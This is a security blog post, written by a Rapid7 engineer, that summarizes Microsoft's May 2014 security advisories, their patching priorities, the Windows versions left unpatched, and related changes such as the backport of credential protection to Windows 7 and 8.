There is a lot going on in the updates from Microsoft this month, including some very interesting and long time coming changes. Also, it’s the highest volume of advisories so far this year, with eight dropping on us, two of which are labeled as critical.
How to describe the patching priority is going to be very subjective. Microsoft has identified three of these advisories: MS14-024, MS14-025, & MS14-029, the IE patch as priority 1 patching concerns. Interestingly MS14-029 which is the update to IE is the only one of the two critical issues to receive the patching priority one designation. The other critical, MS14-022, affecting SharePoint is a priority two for patching. This is due to the complexity of the attack and the fact that it is privately reported and not known to be in public exploitation.
MS14-029 is an interesting advisory. It is not a cumulative rollup fix for IE, which breaks with the recent trend of IE patching, but it does re-include the patch for MS14-021 which was fixed outside of the normal patch cycle on May 1st. It’s not yet clear if this modifies the original fix or simply provides another vector for customers to get it. One of the other CVEs fixed in this advisory is under limited, targeted attack. Also, there are two flavors of this patch for Windows 8.1 users, one for those who took the “Spring 2014 update rollup” and one for those who did not. Not to mention that this is the first advisory that clearly would have applied to Windows XP, but for which a patch is not available. IE 6, 7, & 8 are vulnerable on Windows 2003 SP2, this would historically have mapped to the same scope of XP patches, but not this time. Anyone still using XP just got a little less secure – not that they were well off to begin with.
Of the other two, important but highest patching priority issues, MS14-024 is a fix for an ASLR bypass. That means that this issue is not really an exploit in and of itself, hence the “important” designation, but a weakness that is used in conjunction with other exploits to increase the likelihood of successfully controlling the location of memory manipulation. MS14-024 has been detected in use in conjunction with other attacks.
MS14-025 isn’t really a fix for the underlying issue, it just stops system administrators from doing something that weakens their overall security going forward by preventing them from specifying a local administrator password in group policy settings where anyone on the network can recover it in a reusable form. However, administrators who have already made that mistake will not have the setting removed and will still have to take other measures to plug that hole.
MS14-027 is an elevation of privilege issue that was privately reported to Microsoft, but again, has been detected in use in limited, targeted attacks in the wild.
MS14-028 is a denial of service affecting Windows Servers with the iSCSI service installed. The service is not installed by default on Windows 2008 or 2008 R2, and is installed but disabled by default on Windows 2012. The interesting note here is that there is no fix available for Windows 2008, even though it is vulnerable. 2008 R2 and 2012 are being patched, but apparently fixing the issue on 2008 would severely affect compatibility with iSCSI devices-Â¦so time to update the OS version on your file server folks.
On top of the numbered advisories, Microsoft is rolling out an update for bundled Flash versions on Windows 8 and later, a functionality change to UEFI affecting secure boot and offline backups, and most interestingly, is back porting the “credentials protection” functionality recently released for Windows 8.1 to Windows 7 & 8 users. That last change is meant to make credential replay attacks much harder to accomplish, but is not a complete fix for “pass the hash” type attacks.
Author: Ross Barrett, Senior Manager, Security Engineering, Rapid7.